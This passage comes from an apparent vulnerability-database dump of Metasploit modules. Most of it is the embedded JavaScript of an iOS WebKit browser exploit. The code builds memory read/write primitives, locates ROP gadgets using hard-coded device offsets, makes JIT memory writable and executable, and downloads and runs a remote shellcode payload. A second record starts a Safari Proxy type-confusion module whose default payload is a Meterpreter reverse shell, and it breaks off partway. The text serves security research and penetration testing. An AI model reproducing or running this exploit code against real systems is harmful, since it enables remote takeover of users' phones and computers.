true\n var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var 
cache_slide = Sub(hdr, base_seg.addr);\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\n var offset_cache = {\n // iPod Touch 10.1.1\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\n\n // iPhone 5S 10.2.1\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\n\n // iPhone 6S 11.0.3\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\n };\n\n var offsets = offset_cache[uuid];\n if (offsets)\n {\n var k = Object.keys(offsets);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n offsets[s] = Add(offsets[s], cache_slide);\n }\n }\n else\n {\n var syms = {};\n var gadgets = {};\n\n for(var i = 0; i < segs.length; ++i)\n {\n segs[i].addr = Add(segs[i].addr, cache_slide);\n }\n var libs =\n {\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\n #{ ios_11 ? 
'\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\n ' : '\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\n '}\n }\n\n #{ ios_11 ? '\n var opcodes = {\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\n // mov x4, x20 ; blr x8\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\n }\n var opcode_libs = [\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\n ];\n\n ' : '\n var opcodes = {\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\n \"dispatch\": [\n // blr x21; ldp x29, x30, 
[sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\n ],\n \"stackloader\": [\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\n ],\n };\n\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\n '}\n\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\n var nimgs = memory.u32(Add(hdr, 0x1c));\n for(var i = 0; i < nimgs; ++i)\n {\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\n var fn = function(i)\n {\n return memory.read(Add(straddr, i), 1)[0];\n };\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\n if(opcode_libs.some(lib => strcmp(fn, lib)))\n {\n var ncmds = memory.u32(Add(base, 0x10));\n for(var j = 0, off = 0x20; j < ncmds; ++j)\n {\n var cmd = memory.u32(Add(base, off));\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\n {\n var nsects = memory.u32(Add(base, off + 0x40));\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\n {\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\n {\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\n if (keys.length == 0) break;\n\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), 
cache_slide)\n var size = memory.u32(Add(base, o + 0x28))\n\n // Copy the entire __text region into a Uint32Array for faster processing.\n // Previously you could map a Uint32Array over the data, but on i7+ devices\n // this caused access violations.\n // Instead we read the entire region and copy it into a Uint32Array. The\n // memory.read primitive has a weird limitation where it's only able to read\n // up to 4096 bytes. to get around this we'll read multiple times and combine\n // them into one.\n\n var allData = new Uint32Array(size / 4)\n for (var r = 0; r < size; r += 4096) {\n // Check to ensure we don't read out of the region we want\n var qty = 4096\n if (size - r < qty) {\n qty = size - r\n }\n var data = memory.read(Add(addr, r), qty)\n\n // Data is an array of single bytes. This code takes four entries\n // and converts them into a single 32-bit integer. It then adds it\n // into the `allData` array at the given index\n for (var h = 0; h < qty; h += 4) {\n var fourBytes = b2u32(data.slice(h, h + 4))\n allData[(r + h) / 4] = fourBytes\n }\n }\n\n // Loop through the entire data map looking for each gadget we need\n for (var f = 0; f < size && keys.length > 0; f++) {\n\n // Check every gadget\n for (var z = 0; z < keys.length; z++) {\n var key = keys[z];\n var opcode_list = opcodes[key];\n for (var y = 0; y < opcode_list.length; y++) {\n var opcode = opcode_list[y];\n for (var t = 0; t < opcode.length; t++) {\n var op = allData[f+t];\n if (op == opcode[t]) {\n if (t == opcode.length - 1) {\n gadgets[key] = Add(addr, f*4);\n keys.splice(z, 1);\n z = keys.length;\n break;\n }\n continue;\n }\n break;\n }\n }\n }\n }\n\n break;\n }\n o += 0x50;\n }\n break;\n }\n off += memory.u32(Add(base, off + 0x4));\n }\n continue;\n }\n var lookup = null;\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\n {\n if(strcmp(fn, k[j]))\n {\n lookup = libs[k[j]];\n break;\n }\n }\n if(lookup != null)\n {\n fsyms(memory, base, segs, lookup, syms);\n }\n }\n\n var 
vals = Object.keys(libs).map(function(key) {\n return libs[key];\n });\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(syms[s] == null)\n {\n fail(s);\n }\n syms[s] = Add(syms[s], cache_slide);\n }\n k = Object.keys(opcodes);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(gadgets[s] == null)\n {\n fail(s);\n }\n }\n\n offsets = {}\n offsets[\"regloader\"] = gadgets[\"regloader\"];\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\n offsets[\"movx4\"] = gadgets[\"movx4\"];\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\n\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\n }\n #{ ios_11 ? 
'\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\n }' : ''}\n\n#{dump_offsets}\n\n }\n\n\n var regloader = offsets[\"regloader\"];\n var dispatch = offsets[\"dispatch\"];\n var stackloader = offsets[\"stackloader\"];\n var longjmp = offsets[\"__longjmp\"];\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\n var memmove = offsets[\"__platform_memmove\"];\n var dlopen = offsets[\"_dlopen\"];\n var dlsym = offsets[\"_dlsym\"];\n var task_self = offsets[\"_mach_task_self_\"]\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\n var movx4 = offsets[\"movx4\"]; // might be null\n\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\n var memPoolEnd = memory.readInt64(endOfFixedMem);\n\n var memPoolStart = Int64.Zero;\n if (startOfFixedMem) {\n memPoolStart = memory.readInt64(startOfFixedMem);\n }\n\n var jitWriteSeparateHeaps = Int64.Zero;\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\n }\n\n var shsz = new Int64(\"0x100000\");\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\n var codeAddr = Sub(memPoolEnd, shsz);\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\n\n memory.writeInt64(Add(vtab, 0x18), longjmp);\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\n\n var arrsz = 0x100000,\n off = 0x1000;\n var arr = new Uint32Array(arrsz);\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\n\n var pos = arrsz - off;\n\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\n x4 = x4 || 
Int64.Zero\n\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\n arr[pos++] = 0xdead0014; // x27 (unused)\n arr[pos++] = 0xdead0015; // x27 (unused)\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\n arr[pos++] = func.lo(); // x21 (func)\n arr[pos++] = func.hi(); // x21 (func)\n arr[pos++] = 0xdbad0018; // x20 (unused)\n arr[pos++] = 0xdbad0019; // x20 (unused)\n arr[pos++] = 0xdead001a; // x19 (unused)\n arr[pos++] = 0xdead001b; // x19 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\n arr[pos++] = regloader.lo(); // x30 (first gadget)\n arr[pos++] = regloader.hi(); // x30 (first gadget)\n\n // after dispatch:\n arr[pos++] = 0xdead0020; // unused\n arr[pos++] = 0xdead0021; // unused\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\n arr[pos++] = jump_to.lo(); // x30 
(gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\n //x4 = x4 || Int64.One\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = 0xdead1101; // x28 (unused)\n arr[pos++] = 0xdead1102; // x28 (unused)\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\n arr[pos++] = 0xdead0016; // x26 (unused)\n arr[pos++] = 0xdead0017; // x26 (unused)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdead0018; // x20 (unused)\n arr[pos++] = 0xdead0019; // x20 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdead001c; // x29 (unused)\n arr[pos++] = 0xdead001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n if (x4) {\n arr[pos++] = stackloader.lo();\n arr[pos++] = stackloader.hi();\n } else {\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\n }\n arr[pos++] = 0xdead1401; // (unused)\n arr[pos++] = 0xdead1402; // (unused)\n arr[pos++] = 0xdead1301; // x20 (unused)\n arr[pos++] = 0xdead1302; // x20 (unused)\n 
arr[pos++] = x1.lo(); // x19 == x1 (arg2)\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\n arr[pos++] = 0xdead1201; // x29 (unused)\n arr[pos++] = 0xdead1202; // x29 (unused)\n arr[pos++] = regloader.lo(); // x30 (next gadget)\n arr[pos++] = regloader.hi(); // x30 (next gadget)\n\n // in regloader\n // NOTE: REGLOADER DOES NOT ADJUST SP!\n // sometimes i didn't get expected value in x4\n // and i have no earthly idea why\n // usleep likely did the trick, but I would still keep the code\n // with movx4\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\n\n if (x4) {\n // in stackloader:\n arr[pos++] = 0xdaad0010; // unused\n arr[pos++] = 0xdaad0011; // unused\n arr[pos++] = 0xdaad0012; // unused\n arr[pos++] = 0xdaad0013; // unused\n arr[pos++] = 0xdaad1101; // x28 (unused)\n arr[pos++] = 0xdaad1102; // x28 (unused)\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0016; // x26 (unused)\n arr[pos++] = 0xdaad0017; // x26 (unused)\n arr[pos++] = 0xdaad0018; // x25 (unused)\n arr[pos++] = 0xdaad0019; // x25 (unused)\n arr[pos++] = 0xdaad00f0; // x24 (unused)\n arr[pos++] = 0xdaad00f1; // x24 (unused)\n arr[pos++] = 0xdaad00f2; // x23 (unused)\n arr[pos++] = 0xdaad00f3; // x23 (unused)\n arr[pos++] = 0xdaad00f4; // x22 (unused)\n arr[pos++] = 0xdaad00f5; // x22 (unused)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdaad0018; // x20 (unused)\n arr[pos++] = 0xdaad0019; // x20 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdaad001c; // x29 (unused)\n arr[pos++] = 0xdaad001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next 
gadget)\n\n // in ldrx8\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\n arr[pos++] = 0xdaad1401; // (unused)\n arr[pos++] = 0xdaad1402; // (unused)\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\n arr[pos++] = 0xdaad1301; // x19 (unused)\n arr[pos++] = 0xdaad1302; // x19 (unused)\n arr[pos++] = 0xdaad1201; // x29 (unused)\n arr[pos++] = 0xdaad1202; // x29 (unused)\n arr[pos++] = movx4.lo(); // x30 (next gadget)\n arr[pos++] = movx4.hi(); // x30 (next gadget)\n }\n\n // after dispatch:\n\n // keep only one: these or 0xdeaded01\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n arr[pos++] = 0xdead002c; // x29 (unused)\n arr[pos++] = 0xdead002d; // x29 (unused)\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\n x0 = x0 || Int64.Zero\n x1 = x1 || Int64.Zero\n x2 = x2 || Int64.Zero\n x3 = x3 || Int64.Zero\n jump_to = jump_to || stackloader\n\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\n func, x0, x1, x2, x3, x4, jump_to\n )\n }\n\n #{ios_11 ? 
'\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\n add_call(jitWriteSeparateHeaps\n , Sub(codeAddr, memPoolStart) // off\n , paddr // src\n , shsz // size\n );\n } else {\n fail(\"jitWrite\");\n }\n ' : '\n add_call(mach_vm_protect,\n mach_task_self_, // task\n codeAddr, // addr\n shsz, // size\n new Int64(0), // set maximum\n new Int64(7) // prot (RWX)\n );\n\n add_call(memmove,\n codeAddr, // dst\n paddr, // src\n shsz // size\n );\n '}\n\n add_call(codeAddr,\n dlopen,\n dlsym,\n jitWriteSeparateHeaps,\n memPoolStart,\n memPoolEnd,\n );\n\n for(var i = 0; i < 0x20; ++i)\n {\n arr[pos++] = 0xde00c0de + (i<<16);\n }\n\n var sp = Add(stack, (arrsz - off) * 4);\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\n\n // trigger\n //print(\"u rdy?\")\n wrapper.addEventListener(\"click\", function(){});\n\n}\n\n#{get_mem_rw}\n\nfunction go() {\n try {\n var req = new XMLHttpRequest;\n req.open(\"GET\", \"exploit\");\n req.responseType = \"arraybuffer\";\n req.addEventListener(\"load\", function() {\n try {\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\n payload.set(new Uint8Array(req.response), 0x0);\n pwn();\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n });\n req.addEventListener(\"error\", function(ev) {\n fail(ev)\n });\n req.send()\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? 
\" \" + e.stack : \"\"))\n }\n};\n\ngo();\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/\\/\\/.*$/, '') # strip comments\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/browser/webkit_createthis.rb"}, {"lastseen": "2021-01-16T00:33:30", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The JIT region is then replaced with shellcode which loads the second stage. 
The second stage exploits a logic error in libxpc, which uses command execution via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4233", "CVE-2018-4404"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. 
an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'saelo' ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2018-4404'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/saelo/pwn2own2018'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ],\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\n 'Platform' => 'osx',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n 